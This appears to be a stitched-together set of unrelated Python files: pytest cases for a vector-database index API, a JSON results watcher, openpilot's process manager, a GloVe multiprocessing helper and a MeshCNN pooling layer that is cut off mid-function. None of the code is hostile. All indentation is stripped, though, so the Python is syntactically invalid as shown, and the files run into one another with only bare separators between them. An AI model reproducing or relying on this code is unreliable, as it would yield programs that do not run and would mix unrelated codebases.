expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed, error = collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
results_watcher.py
|
#!/usr/bin/python3
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import json
import time
from threading import Thread
WATCHER_POLL_TIME = 0.01
class ResultsWatcher:
def __init__(self, filename, sleep_time=WATCHER_POLL_TIME):
self.filename = filename
self.sleep_time = sleep_time
self.watcher_thread = None
self.trigger_stop = False
self.error_message = None
def watch(self):
self.watcher_thread = Thread(target=self.watch_method)
self.trigger_stop = False
self.watcher_thread.start()
def stop(self):
self.trigger_stop = True
self.watcher_thread.join()
if self.error_message:
raise OSError(self.error_message)
def watch_method(self):
try:
with open(self.filename, 'r') as file:
while not self.trigger_stop:
where = file.tell()
line = file.readline()
if not line:
time.sleep(self.sleep_time)
file.seek(where)
else:
try:
ResultsWatcher.print_results(json.loads(line))
except ValueError:
pass
except OSError:
self.error_message = "Unable to read from destination metadata file {}".format(self.filename)
# Print Functions
@classmethod
def print_results(cls, results):
object_output = []
for detected_object in results.get("objects", []):
ResultsWatcher.process_detections(detected_object, object_output)
event_output = []
for event in results.get("events", []):
current_event = []
for key in event:
current_event.append("{}: {}".format(key, event[key]))
if current_event:
event_output.append("Event: {}".format(", ".join(current_event)))
if "timestamp" in results and (object_output or event_output):
print("Timestamp {}".format(results["timestamp"]))
if object_output:
print("{}".format("\n".join(object_output)))
if event_output:
print("{}".format("\n".join(event_output)))
@staticmethod
def process_detections(detected_object, object_output):
meta = {}
current_object = []
for key in detected_object:
if key == "detection":
confidence = detected_object[key]["confidence"]
label = detected_object[key]["label"]
bbox = detected_object[key]["bounding_box"]
current_object.append(label)
current_object.append("({:.2f})".format(confidence))
current_object.append("[{:.2f}, {:.2f}, {:.2f}, {:.2f}]"
.format(bbox["x_min"],
bbox["y_min"],
bbox["x_max"],
bbox["y_max"]))
elif key == "id":
meta[key] = detected_object[key]
elif isinstance(detected_object[key], dict) and "label" in detected_object[key]:
meta[key] = detected_object[key]["label"]
elif key == "tensors":
for tensor in detected_object[key]:
if "name" in tensor and tensor["name"] == "action":
confidence = tensor["confidence"]
label = tensor["label"]
current_object.append(label)
current_object.append("({:.2f})".format(confidence))
if meta:
current_object.append(str(meta))
if current_object:
object_output.append("- {}".format(" ".join(current_object)))
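# Hedged usage sketch (not part of the original module; the file name below is
# hypothetical): tail a metadata file that a pipeline appends JSON lines to,
# print any detections for a few seconds, then stop the watcher.
if __name__ == "__main__":
    open("results.jsonl", "a").close()  # ensure the watched file exists
    watcher = ResultsWatcher("results.jsonl")
    watcher.watch()
    time.sleep(5)    # let the watcher poll for new lines
    watcher.stop()   # re-raises any read failure as OSError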
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
  # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
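# Hedged usage sketch (the process name and module below are hypothetical, not
# part of openpilot): a fork could register an extra python daemon with
#   register_managed_process("exampled", "selfdrive.exampled", car_started=False)
# which makes manager start it alongside the other persistent processes.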
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON and "QT" not in os.environ:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
if msg.deviceState.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
multiprocess_utils.py
|
import logging
from multiprocessing import Process
from time import time
import numpy as np
import tensorflow as tf
from multiprocessing.sharedctypes import RawArray
def split_share_data(rows, cols, coocs, split_n):
"""
    This method takes the rows, cols and cooc(currence) values from the GloVe co-occurrence sparse matrix and
    splits them into sub-lists of RawArrays that multiple processes can access in parallel.
    Sharing the chunks through RawArray avoids replicating the memory space when multiprocessing.
:param rows: indexes of the non-empty rows of the co-occurrence matrix
:param cols: indexes of the non-empty cols of the co-occurrence matrix
:param coocs: non-empty values of the co-occurrence matrix
    :param split_n: number of chunks to split the arrays into
:return: 3 lists of RawArrays
"""
total_length = len(rows)
raws_rows_list = list()
raws_cols_list = list()
raws_coocs_list = list()
for ix in range(split_n):
min_ix = ix * total_length // split_n
max_ix = min((ix + 1) * total_length // split_n, total_length - 1)
split_len = max_ix - min_ix
# Create the empty RawArrays
rows_raw = RawArray(typecode_or_type='i', size_or_initializer=split_len)
cols_raw = RawArray(typecode_or_type='i', size_or_initializer=split_len)
coocs_raw = RawArray(typecode_or_type='f', size_or_initializer=split_len)
# Cast the c-types to numpy types, and reshape
rows_np = np.frombuffer(rows_raw, dtype=np.int32).reshape(split_len)
cols_np = np.frombuffer(cols_raw, dtype=np.int32).reshape(split_len)
coocs_np = np.frombuffer(coocs_raw, dtype=np.float32).reshape(split_len)
# Copy data to our shared array
np.copyto(rows_np, rows[min_ix: max_ix])
np.copyto(cols_np, cols[min_ix: max_ix])
np.copyto(coocs_np, coocs[min_ix: max_ix])
# Add data to the lists
raws_rows_list.append(rows_raw)
raws_cols_list.append(cols_raw)
raws_coocs_list.append(coocs_raw)
return raws_rows_list, raws_cols_list, raws_coocs_list
def parallelize_function(function, parallel_n, *iterables):
"""
    Parallelize a function across parallel_n processes;
    the tf.train.Coordinator is used to wait for all the processes (e.g. tfrecord writers) to finish.
:param function: function to parallelize
:param parallel_n: number of processes to run in parallel
:param iterables: elements to apply the function on
:return: None
"""
coord = tf.train.Coordinator()
processes = []
start_time = time()
for process_ix in range(parallel_n):
args = tuple([iterable[process_ix] for iterable in iterables])
p = Process(target=function, args=args)
p.start()
processes.append(p)
coord.join(processes)
logging.info(f"Saved to tfrecords {time() - start_time:2f} seconds")
|
mesh_pool.py
|
import torch
import torch.nn as nn
from threading import Thread
from models.layers.mesh_union import MeshUnion
import numpy as np
from heapq import heappop, heapify
import pdb
class MeshPool(nn.Module):
def __init__(self, target, multi_thread=False):
print(f'target edges: {target}')
super(MeshPool, self).__init__()
self.__out_target = target
self.__multi_thread = multi_thread
self.__fe = None
self.__updated_fe = None
self.__meshes = None
self.__merge_edges = [-1, -1]
def __call__(self, fe, meshes):
return self.forward(fe, meshes)
def forward(self, fe, meshes):
# for each mesh call __pool_main
        # to do it in parallel, create threads and collect the results.
# fe.shape -> [1, 16, 16]
self.__updated_fe = [[] for _ in range(len(meshes))] # len(meshes) -> 1
# self.__updated_fe = [[]]
pool_threads = []
self.__fe = fe
self.__meshes = meshes
# iterate over batch
for mesh_index in range(len(meshes)):
if self.__multi_thread:
pool_threads.append(Thread(target=self.__pool_main, args=(mesh_index,)))
pool_threads[-1].start()
else:
self.__pool_main(mesh_index)
if self.__multi_thread:
for mesh_index in range(len(meshes)):
pool_threads[mesh_index].join()
out_features = torch.cat(self.__updated_fe).view(len(meshes), -1, self.__out_target)
return out_features
def __pool_main(self, mesh_index):
mesh = self.__meshes[mesh_index]
# build a priority queue for the mesh edges
# check - http://staff.ustc.edu.cn/~csli/graduate/algorithms/book6/chap07.htm for details
# lowest mag edges at top of heap
# these edges get removed first
queue = self.__build_queue(self.__fe[mesh_index, :, :mesh.edges_count], mesh.edges_count)
# recycle = []
# last_queue_len = len(queue)
last_count = mesh.edges_count + 1
        mask = np.ones(mesh.edges_count, dtype=bool)  # np.bool is deprecated in newer numpy; use the builtin bool
edge_groups = MeshUnion(mesh.edges_count, self.__fe.device)
print(self.__out_target)
# pdb.set_trace()
while mesh.edges_count > self.__out_target:
value, edge_id = heappop(queue)
# print(edge_id)
edge_id = int(edge_id)
# if edge_id in [8, 19, 20, 25]:
# if edge_id == 19:
# pdb.set_trace()
# else:
# continue
if mask[edge_id]:
self.__pool_edge(mesh, edge_id, mask, edge_groups)
mesh.clean(mask, edge_groups)
fe = edge_groups.rebuild_features(self.__fe[mesh_index], mask, self.__out_target)
self.__updated_fe[mesh_index] = fe
def __pool_edge(self, mesh, edge_id, mask, edge_groups):
if self.has_boundaries(mesh, edge_id):
            # if it's a boundary edge like [A, D] you cannot pool it
return False
elif self.__clean_side(mesh, edge_id, mask, edge_groups, 0)\
and self.__clean_side(mesh, edge_id, mask, edge_groups, 2) \
and self.__is_one_ring_valid(mesh, edge_id):
self.__merge_edges[0] = self.__pool_side(mesh, edge_id, mask, edge_groups, 0) # edge_id=19, mask -> all ones
# redirected gemm edges from edges 18 and 19, deleted edge 18, total edges = 32
# self.__merge_edges[0] = 20
self.__merge_edges[1] = self.__pool_side(mesh, edge_id, mask, edge_groups, 2) # edge_id=19, mask -> all ones
# self.__merge_edges = [18, 12]
# self.__merge_edges = [20, 5]
mesh.merge_vertices(edge_id) # edge_id -> 19
mask[edge_id] = False
MeshPool.__remove_group(mesh, edge_groups, edge_id)
mesh.edges_count -= 1
return True
else:
return False
def __clean_side(self, mesh, edge_id, mask, edge_groups, side):
if mesh.edges_count <= self.__out_target:
# if your number of edges are less than what you intend to have after pooling
# then you do not need to pool the edge
return False
invalid_edges = MeshPool.__get_invalids(mesh, edge_id, edge_groups, side)
while len(invalid_edges) != 0 and mesh.edges_count > self.__out_target:
self.__remove_triplete(mesh, mask, edge_groups, invalid_edges)
if mesh.edges_count <= self.__out_target:
return False
if self.has_boundaries(mesh, edge_id):
return False
invalid_edges = self.__get_invalids(mesh, edge_id, edge_groups, side)
return True
@staticmethod
def has_boundaries(mesh, edge_id):
# if edge is like the [A, D] edge
# if any of your neighbors are boundary edges like [A, D] you cannot pool that edge
for edge in mesh.gemm_edges[edge_id]:
if edge == -1 or -1 in mesh.gemm_edges[edge]:
return True
return False
@staticmethod
def __is_one_ring_valid(mesh, edge_id):
# edge_id = 19, 4 nbrs - [15, 8, 5, 12]
# v_a = vertices of edge_id [12, 13] FJ
v_a = set(mesh.edges[mesh.ve[mesh.edges[edge_id, 0]]].reshape(-1)) # set of edge ids 12 belongs to - length is 6
v_b = set(mesh.edges[mesh.ve[mesh.edges[edge_id, 1]]].reshape(-1)) # set of edge ids 13 belongs to - length is 6
# v_a = {4, 5, 6, 7, 12, 13, 14}
# v_b = {2, 4, 11, 12, 13, 14, 15}
# v_a & v_b - {13, 4, 12, 14}
# {13, 4, 12, 14} - {12, 13} = {4, 14}
shared = v_a & v_b - set(mesh.edges[edge_id])
return len(shared) == 2
def __pool_side(self, mesh, edge_id, mask, edge_groups, side):
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, side_a, side_b, _, other_side_b, _, other_keys_b = info
# (20, 18, 1, 0, 2, 2, [15, 22], [25, 8])
self.__redirect_edges(mesh, key_a, side_a - side_a % 2, other_keys_b[0], mesh.sides[key_b, other_side_b])
# mesh.gemm_edges[20] = [18, 19, 15, 22] -> [25, 19, 15, 22] # 18 replaced with 25
# mesh.gemm_edges[25] = [26, 24, 8, 18] -> [26, 24, 8, 20] # 18 replaced with 20
self.__redirect_edges(mesh, key_a, side_a - side_a % 2 + 1, other_keys_b[1], mesh.sides[key_b, other_side_b + 1])
# mesh.gemm_edges[20] = [25, 19, 15, 22] -> [25, 8, 15, 22] # 19 replaced by 8
# mesh.gemm_edges[8] = [ 6, 7, 18, 25] -> [ 6, 7, 20, 25] # 18 replaced by 20
MeshPool.__union_groups(mesh, edge_groups, key_b, key_a) # groups[20,:] = zeros except at 20 and 18
MeshPool.__union_groups(mesh, edge_groups, edge_id, key_a) # groups[20,:] = zeros except at 20, 18 and 19
mask[key_b] = False # mask[18] = False, 2nd pass key_b = 12
# redirect all edges from 18 and 12 and remove edge 18 and 12
MeshPool.__remove_group(mesh, edge_groups, key_b) # no changes initially as there is no history object
mesh.remove_edge(key_b) # remove edge_id association with vertices of that edge.
mesh.edges_count -= 1 # decrease overall count of edges
# second time
# (5, 12, 3, 2, 0, 0, [3, 4], [13, 14])
# mesh.gemm_edges[5] -> [ 3, 4, 12, 19] -> [ 3, 4, 13, 19] # 12 replaced by 13
# mesh.gemm_edges[13] -> [14, 12, -1, -1] -> [14, 5, -1, -1] # 12 replaced by 5
# mesh.gemm_edges[5] -> [ 3, 4, 13, 19] -> [ 3, 4, 13, 14] # 19 replaced by 14
        # mesh.gemm_edges[14] -> [12, 13, 9, 16] -> [ 5, 13, 9, 16] # 12 replaced with 5
# union groups -> groups[5, :] = all zeros except 5, 12
# union groups -> groups[5, :] = all zeros except 5, 12, 19
# mask[12] -> False
# remove edge with edge_id 12
        return key_a  # final return: key_a = 5
@staticmethod
def __get_invalids(mesh, edge_id, edge_groups, side):
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, side_a, side_b, other_side_a, other_side_b, other_keys_a, other_keys_b = info
# main_edge = 19, key_a = 20, key_b = 18 // FJ, JG, FG
# mesh.sides[edge_id] or mesh.sides[19] = [1, 0, 3, 2] // [key_b, key_a, nbr_other_a, nbr_other_b]
# side_a = 1, side_b = 0, other_side_a = 2, other_side_b = 2
# other_keys_a = [mesh.gemm_edges[key_a, other_side_a], mesh.gemm_edges[key_a, other_side_a + 1]]
# triangles supported by face nbrs are accounted
# other_keys_b = [mesh.gemm_edges[key_b, other_side_b], mesh.gemm_edges[key_b, other_side_b + 1]]
# other_keys_a = [15, 22], other_keys_b = [25, 8] // (CF, CG), (GK, JK)
shared_items = MeshPool.__get_shared_items(other_keys_a, other_keys_b)
# if there are no shared items in other_keys_a and other_keys_b then its valid
#
if len(shared_items) == 0:
return []
else:
            # ignoring this condition as it doesn't occur in my example
# it would occur for case 2 kind of edges
assert (len(shared_items) == 2)
# let GK be shared, then other_keys_a = [15, 25], other_keys_b = [25, 8], shared_items = [1, 0]
middle_edge = other_keys_a[shared_items[0]] # middle_edge = 25
update_key_a = other_keys_a[1 - shared_items[0]] # update_key_a = 15
update_key_b = other_keys_b[1 - shared_items[1]] # update_key_b = 8
update_side_a = mesh.sides[key_a, other_side_a + 1 - shared_items[0]] # update_side_a = 3
update_side_b = mesh.sides[key_b, other_side_b + 1 - shared_items[1]] # update_side_b = 2
# redirect_edges(FJ, CF, sides) here
MeshPool.__redirect_edges(mesh, edge_id, side, update_key_a, update_side_a)
MeshPool.__redirect_edges(mesh, edge_id, side + 1, update_key_b, update_side_b) # 19, 1, 8, 2
MeshPool.__redirect_edges(mesh, update_key_a, MeshPool.__get_other_side(update_side_a), update_key_b, MeshPool.__get_other_side(update_side_b))
# 15, 2, 8, 3
MeshPool.__union_groups(mesh, edge_groups, key_a, edge_id) # zeros(33x33), 20, 19, # groups[19,:] = all zeros except at position 19, 20
